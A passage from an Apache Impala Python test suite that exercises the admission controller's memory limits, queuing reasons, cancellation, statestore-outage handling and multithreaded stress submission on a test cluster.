self.client.set_configuration({"MEM_LIMIT_EXECUTORS": expected_exec_mem_limit})
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
assert expected_mem_limits['executor'] > expected_mem_limits[
'coordinator'], expected_mem_limits
assert expected_mem_limits['executor'] == float(
expected_exec_mem_limit), expected_mem_limits
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT,
queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS),
start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G",
statestored_args=_STATESTORED_ARGS)
def test_heterogeneous_proc_mem_limit(self, vector):
""" Test to ensure that the admission controller takes into account the actual proc
mem limits of each impalad. Starts a cluster where the last impalad has a smaller
proc mem limit than other impalads and runs queries where admission/rejection decision
depends on the coordinator knowing the other impalad's mem limits.
The queue_wait_timeout_ms has been set to be more than the prioritized statestore
update time, so that the queries don't time out before receiving updates to pool
stats"""
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg, (select 1) B limit 1"
# Successfully run a query with mem limit equal to the lowest process memory among
# impalads
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
self.execute_query_expect_success(self.client, query, exec_options)
# Test that a query scheduled to run on a single node and submitted to the impalad
# with higher proc mem limit succeeds.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
exec_options['num_nodes'] = "1"
self.execute_query_expect_success(self.client, query, exec_options)
# Exercise rejection checks in admission controller.
try:
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
" is greater than memory available for admission 2.00 GB of \S+", str(e)), \
str(e)
# Exercise queuing checks in admission controller.
try:
# Wait for previous queries to finish to avoid flakiness.
for impalad in self.cluster.impalads:
impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
impalad_with_2g_mem.execute_async("select sleep(1000)")
# Wait for statestore update to update the mem admitted in each node.
sleep(STATESTORE_RPC_FREQUENCY_MS / 1000)
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
# Since Queuing is synchronous and we can't close the previous query till this
# returns, we wait for this to timeout instead.
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
"2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
finally:
if impalad_with_2g_mem is not None:
impalad_with_2g_mem.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
statestored_args=_STATESTORED_ARGS)
def test_cancellation(self):
""" Test to confirm that all Async cancellation windows are hit and are able to
succesfully cancel the query"""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000")
client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
handle = client.execute_async("select 1")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Ready to be Rejected but already cancelled, query id=")
client.clear_configuration()
client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000")
handle = client.execute_async("select 2")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Ready to be Admitted immediately but already cancelled, query id=")
client.set_configuration_option("debug_action",
"CRS_BEFORE_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 3")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=")
client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
handle = client.execute_async("select 4")
sleep(1)
client.close_query(handle)
self.assert_impalad_log_contains('INFO',
"Cancelled right after starting the coordinator query id=", 2)
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
client.set_configuration_option("debug_action",
"AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
queued_query_handle = client.execute_async("select 5")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
# Only cancel the queued query, because close will wait till it unregisters, this
# gives us a chance to close the running query and allow the dequeue thread to
# dequeue the queue query
client.cancel(queued_query_handle)
client.close_query(handle)
client.close_query(queued_query_handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile, queued_profile
self.assert_impalad_log_contains('INFO', "Dequeued cancelled query=")
client.clear_configuration()
handle = client.execute_async("select sleep(10000)")
queued_query_handle = client.execute_async("select 6")
sleep(1)
assert client.get_state(queued_query_handle) == QueryState.COMPILED
assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
client.close_query(queued_query_handle)
client.close_query(handle)
queued_profile = client.get_runtime_profile(queued_query_handle)
assert "Admission result: Cancelled (queued)" in queued_profile
for i in self.cluster.impalads:
i.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.agg-num-running.default-pool") == 0
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.total-admitted.default-pool") == 4
assert self.cluster.impalads[0].service.get_metric_value(
"admission-controller.total-queued.default-pool") == 2
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_num_queries(self):
"""Test that queue details appear in the profile when queued based on num_queries."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select sleep(1000)"
TIMEOUT_S = 60
EXPECTED_REASON = \
"Latest admission queue reason: number of running queries 1 is at or over limit 1"
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S)
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons if 'number of running queries' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of num_queries: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=10 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_memory(self):
"""Test that queue details appear in the profile when queued based on memory."""
# Run a bunch of queries with mem_limit set so that only one can be admitted at a
# time- one should get admitted immediately, the rest should be dequeued one-by-one.
STMT = "select sleep(100)"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\
"available in pool default-pool with max mem resources 10.00 MB. Needed 9.00 MB" \
" but only 1.00 MB was available."
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '9mb'})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail for detail in init_queue_reasons
if 'Not enough aggregate memory available' in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of memory: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
def __extract_init_queue_reasons(self, profiles):
"""Return a list of the 'Admission Queue details' strings found in 'profiles'"""
matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles]
return [match.group(0) for match in matches if match is not None]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=100, max_queued=10,
pool_max_mem=-1, admission_control_slots=4,
executor_groups="default-pool-group1"),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_slots(self):
"""Test that queue details appear in the profile when queued based on number of
slots."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select min(ss_wholesale_cost) from tpcds_parquet.store_sales"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough admission control " +\
"slots available on host"
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, config_options={"mt_dop": 4})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons
if "Not enough admission control slots available on host" in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of slots: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
# Confirm that the cluster quiesces and all metrics return to zero.
for impalad in self.cluster.impalads:
verifier = MetricVerifier(impalad.service)
verifier.wait_for_backend_admission_control_state()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_query_locations_correctness(self, vector):
"""Regression test for IMPALA-7516: Test to make sure query locations and in-flight
queries are correct for different admission results that can affect it."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1"
# Case 1: When a query runs succesfully.
handle = self.client.execute_async(query)
self.__assert_num_queries_accounted(1)
self.close_query(handle)
self.__assert_num_queries_accounted(0)
# Case 2: When a query is queued then cancelled
handle_running = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_running)
handle_queued = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_queued)
self.impalad_test_service.wait_for_metric_value(
"admission-controller.total-queued.default-pool", 1)
# Queued queries don't show up on backends
self.__assert_num_queries_accounted(1, 1)
# First close the queued query
self.close_query(handle_queued)
self.close_query(handle_running)
self.__assert_num_queries_accounted(0)
# Case 3: When a query gets rejected
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "1b"
self.execute_query_expect_failure(self.client, query, exec_options)
self.__assert_num_queries_accounted(0)
def __assert_num_queries_accounted(self, num_running, num_queued=0):
"""Checks if the num of queries accounted by query_locations and in-flight are as
expected"""
# Wait for queries to start/un-register.
num_inflight = num_running + num_queued
assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight)
query_locations = self.impalad_test_service.get_query_locations()
for host, num_q in query_locations.items():
assert num_q == num_running, "There should be {0} running queries on either " \
"impalads: {0}".format(query_locations)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_mem_limit_configs(self, vector):
"""Runs functional tests for the max/min_query_mem_limit pool config attributes"""
exec_options = vector.get_value('exec_option')
# Set this to the default.
exec_options['exec_single_node_rows_threshold'] = 100
# Set num_nodes to 1 since its easier to see one-to-one mapping of per_host and
# per_cluster values used in the test.
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-max-min-mem-limits', vector)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml",
additional_args="-default_pool_max_requests 1", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_config_change_while_queued(self, vector):
"""Tests that the invalid checks work even if the query is queued. Makes sure that a
queued query is dequeued and rejected if the config is invalid."""
pool_name = "invalidTestPool"
config_str = "max-query-mem-limit"
self.client.set_configuration_option('request_pool', pool_name)
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
self.__wait_for_change_to_profile(sleep_query_handle,
"Admission result: Admitted immediately")
queued_query_handle = self.client.execute_async("select 2")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to be invalid.
llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml")
config = ResourcePoolConfig(self.cluster.impalads[0].service, llama_site_path)
config.set_config_value(pool_name, config_str, 1)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
# Change the config back to a valid value
config.set_config_value(pool_name, config_str, 0)
# Now do the same thing for change to pool.max-query-mem-limit such that it can no
# longer accommodate the largest min_reservation.
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
queued_query_handle = self.client.execute_async(
"select * from functional_parquet.alltypes limit 1")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to something less than the what is required to accommodate the
# largest min_reservation (which in this case is 32.09 MB.
config.set_config_value(pool_name, config_str, 25 * 1024 * 1024)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20),
self.close_query(queued_query_handle)
def __wait_for_change_to_profile(self, query_handle, search_string, timeout=20):
for _ in range(timeout * 10):
profile = self.client.get_runtime_profile(query_handle)
if search_string in profile:
return
sleep(0.1)
assert False, "Timed out waiting for change to profile\nSearch " \
"String: {0}\nProfile:\n{1}".format(search_string, str(profile))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024))
@needs_session()
def test_queuing_status_through_query_log_and_exec_summary(self):
"""Test to verify that the HS2 client's GetLog() call and the ExecSummary expose
the query's queuing status, that is, whether the query was queued and what was the
latest queuing reason."""
# Start a long running query.
long_query_resp = self.execute_statement("select sleep(10000)")
# Ensure that the query has started executing.
self.wait_for_admission_control(long_query_resp.operationHandle)
# Submit another query.
queued_query_resp = self.execute_statement("select 1")
# Wait until the query is queued.
self.wait_for_operation_state(queued_query_resp.operationHandle,
TCLIService.TOperationState.PENDING_STATE)
# Check whether the query log message correctly exposes the queuing status.
get_log_req = TCLIService.TGetLogReq()
get_log_req.operationHandle = queued_query_resp.operationHandle
log = self.hs2_client.GetLog(get_log_req).log
assert "Admission result : Queued" in log, log
assert "Latest admission queue reason : number of running queries 1 is at or over "
"limit 1" in log, log
# Now check the same for ExecSummary.
summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq()
summary_req.operationHandle = queued_query_resp.operationHandle
summary_req.sessionHandle = self.session_handle
exec_summary_resp = self.hs2_client.GetExecSummary(summary_req)
assert exec_summary_resp.summary.is_queued
assert "number of running queries 1 is at or over limit 1" in \
exec_summary_resp.summary.queued_reason,\
exec_summary_resp.summary.queued_reason
# Close the running query.
self.close(long_query_resp.operationHandle)
# Close the queued query.
self.close(queued_query_resp.operationHandle)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3,
pool_max_mem=1024 * 1024 * 1024) +
" --admission_control_stale_topic_threshold_ms={0}".format(
STALE_TOPIC_THRESHOLD_MS),
statestored_args=_STATESTORED_ARGS)
def test_statestore_outage(self):
"""Test behaviour with a failed statestore. Queries should continue to be admitted
but we should generate diagnostics about the stale topic."""
self.cluster.statestored.kill()
impalad = self.cluster.impalads[0]
# Sleep until the update should be definitely stale.
sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5)
ac_json = impalad.service.get_debug_webpage_json('/admission')
ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"]
assert ms_since_update > STALE_TOPIC_THRESHOLD_MS
assert ("Warning: admission control information from statestore is stale:" in
ac_json["statestore_update_staleness_detail"])
# Submit a batch of queries. One should get to run, one will be rejected because
# of the full queue, and the others will run after being queued.
STMT = "select sleep(100)"
TIMEOUT_S = 60
NUM_QUERIES = 5
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, allow_query_failure=True)
ADMITTED_STALENESS_WARNING = \
"Warning: admission control information from statestore is stale"
ADMITTED_STALENESS_PROFILE_ENTRY = \
"Admission control state staleness: " + ADMITTED_STALENESS_WARNING
num_queued = 0
num_admitted_immediately = 0
num_rejected = 0
for profile in profiles:
if "Admission result: Admitted immediately" in profile:
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
num_admitted_immediately += 1
elif "Admission result: Rejected" in profile:
num_rejected += 1
# Check that the rejection error returned to the client contains a warning.
query_statuses = [line for line in profile.split("\n")
if "Query Status:" in line]
assert len(query_statuses) == 1, profile
assert ADMITTED_STALENESS_WARNING in query_statuses[0]
else:
assert "Admission result: Admitted (queued)" in profile, profile
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
# Check that the queued reason contains a warning.
queued_reasons = [line for line in profile.split("\n")
if "Initial admission queue reason:" in line]
assert len(queued_reasons) == 1, profile
assert ADMITTED_STALENESS_WARNING in queued_reasons[0]
num_queued += 1
assert num_admitted_immediately == 1
assert num_queued == 3
assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued
@pytest.mark.execute_serially
def test_impala_server_startup_delay(self):
"""This test verifies that queries get queued when the coordinator has already started
accepting client connections during startup, but the local backend descriptor is not
yet available."""
server_start_delay_s = 20
# We need to start the cluster here instead of during setup_method() so we can launch
# it from a separate thread.
def start_cluster():
LOG.info("Starting cluster")
impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % (
1000 * server_start_delay_s)
self._start_impala_cluster(['--impalad_args=%s' % impalad_args])
# Initiate the cluster start
start_cluster_thread = threading.Thread(target=start_cluster)
start_cluster_thread.start()
# Wait some time to arrive at IMPALA_SERVER_END_OF_START
sleep(server_start_delay_s)
# With a new client, execute a query and observe that it gets queued and ultimately
# succeeds.
client = self.create_impala_client()
result = self.execute_query_expect_success(client, "select 1")
start_cluster_thread.join()
profile = result.runtime_profile
reasons = self.__extract_init_queue_reasons([profile])
assert len(reasons) == 1
assert "Local backend has not started up yet." in reasons[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_release_backends(self, vector):
"""Test that executor backends are shutdown when they complete, that completed
executor backends release their admitted memory, and that
NumCompletedBackends is updated each time an executor backend completes."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Craft a query where part of the executor backends completes, while the rest remain
# running indefinitely. The query forces the 'lineitem' table to be treated as the
# small table even though it is bigger than the 'customer' table. This forces the
# small table scan ('lineitem' scan) to run on two nodes and the big table scan
# ('customers' scan) to run on a single node. By using debug actions to force the
# big table scan to hang indefinitely, the small table scan should finish quickly.
# This causes one executor backend to complete quickly, and causes the other one to
# hang.
vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
"tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
# Amount of time to wait for the query to reach the running state before throwing a
# Timeout exception.
timeout = 10
handle = self.execute_query_async(query, vector.get_value('exec_option'))
try:
# Wait for the query to reach the running state (it should never reach the finished
# state because of the 'WAIT' debug action), wait for the 'lineitem' scan to
# complete, and then validate that one of the executor backends shutdowns and
# releases its admitted memory.
self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
# Once the 'lineitem' scan completes, NumCompletedBackends should be 1.
self.assert_eventually(60, 1, lambda: "NumCompletedBackends: 1 (1)"
in self.client.get_runtime_profile(handle))
get_num_completed_backends(self.cluster.impalads[0].service,
handle.get_handle().id) == 1
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
num_executor_zero_admitted = 0
for executor_mem_admitted in mem_admitted['executor']:
if executor_mem_admitted == 0:
num_executor_zero_admitted += 1
assert num_executor_zero_admitted == 1
finally:
# Once the query is closed, validate that all backends have shutdown.
self.client.close_query(handle)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
assert mem_admitted['coordinator'] == 0
for executor_mem_admitted in mem_admitted['executor']:
assert executor_mem_admitted == 0
class TestAdmissionControllerStress(TestAdmissionControllerBase):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. Each query is submitted on a separate thread. After admission, the query
thread will block with the query open and wait for the main thread to notify it to
end its query. The query thread can end its query by fetching to the end, cancelling
itself, closing itself, or waiting for the query timeout to take effect. Depending
on the test parameters a varying number of queries will be admitted, queued, and
rejected. After the queries are admitted, the main thread will request each admitted
query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Request the currently running queries to end and wait for the queries to end.
Verify the metric for the number of completed queries. The threads that
submitted those queries will keep their connections open until the entire test
completes. This verifies that admission control is tied to the end of the query
and does not depend on closing the connection.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
wait for a notification from the main thread.
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('num_queries', *NUM_QUERIES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
# Additional constraints for code coverage jobs and core.
num_queries = None
if ImpalaTestClusterProperties.get_instance().has_code_coverage():
# Code coverage builds can't handle the increased concurrency.
num_queries = 15
elif cls.exploration_strategy() == 'core':
num_queries = 30
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('submission_delay_ms') == 0)
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('round_robin_submission'))
if num_queries is not None:
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('num_queries') == num_queries)
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
# Set shutdown for all threads (cancel if needed)
for thread in self.all_threads:
try:
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
# Wait for all threads to exit
for thread in self.all_threads:
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_admission_metrics(self):
"""
Returns a map of the admission metrics, aggregated across all of the impalads.
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
'rejected', 'released', and 'timed-out'.
"""
metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0,
'released': 0, 'timed-out': 0}
for impalad in self.impalads:
keys = [metric_key(self.pool_name, 'total-%s' % short_name)
for short_name in metrics.keys()]
values = impalad.service.get_metric_values(keys, [0] * len(keys))
for short_name, value in zip(metrics.keys(), values):
metrics[short_name] += value
return metrics
def get_consistent_admission_metrics(self, num_submitted):
"""Same as get_admission_metrics() except retries until it gets consistent metrics for
num_submitted queries. See IMPALA-6227 for an example of problems with inconsistent
metrics where a dequeued query is reflected in dequeued but not admitted."""
ATTEMPTS = 5
for i in xrange(ATTEMPTS):
metrics = self.get_admission_metrics()
admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected']
if admitted_immediately + metrics['dequeued'] == metrics['admitted']:
return metrics
LOG.info("Got inconsistent metrics {0}".format(metrics))
assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\
"{2}".format(num_submitted, ATTEMPTS, metrics)
def wait_for_metric_changes(self, metric_names, initial, expected_delta):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial)
delta_sum = sum([deltas[x] for x in metric_names])
LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.info("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting {0} seconds for metrics {1} delta {2} "\
"current {3} initial {4}" .format(
STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current),
str(initial))
sleep(1)
def wait_for_statestore_updates(self, heartbeats):
"""Waits for a number of admission control statestore updates from all impalads."""
start_time = time()
init = dict()
curr = dict()
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
curr[impalad] = init[impalad]
while True:
LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,)
sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000))
LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.info("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s admitted client rpcs to return. Only %s executing " % (
STRESS_TIMEOUT, num_threads, len(self.executing_threads)))
sleep(0.1)
LOG.info("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
def end_admitted_queries(self, num_queries):
"""
Requests each admitted query to end its query.
"""
assert len(self.executing_threads) >= num_queries
LOG.info("Requesting {0} clients to end queries".format(num_queries))
# Request admitted clients to end their queries
current_executing_queries = []
for i in xrange(num_queries):
# pop() is thread-safe, it's OK if another thread is appending concurrently.
thread = self.executing_threads.pop(0)
LOG.info("Cancelling query %s", thread.query_num)
assert thread.query_state == 'ADMITTED'
current_executing_queries.append(thread)
thread.query_state = 'REQUEST_QUERY_END'
# Wait for the queries to end
start_time = time()
while True:
all_done = True
for thread in self.all_threads:
if thread.query_state == 'REQUEST_QUERY_END':
all_done = False
if all_done:
break
assert (time() - start_time < STRESS_TIMEOUT),\
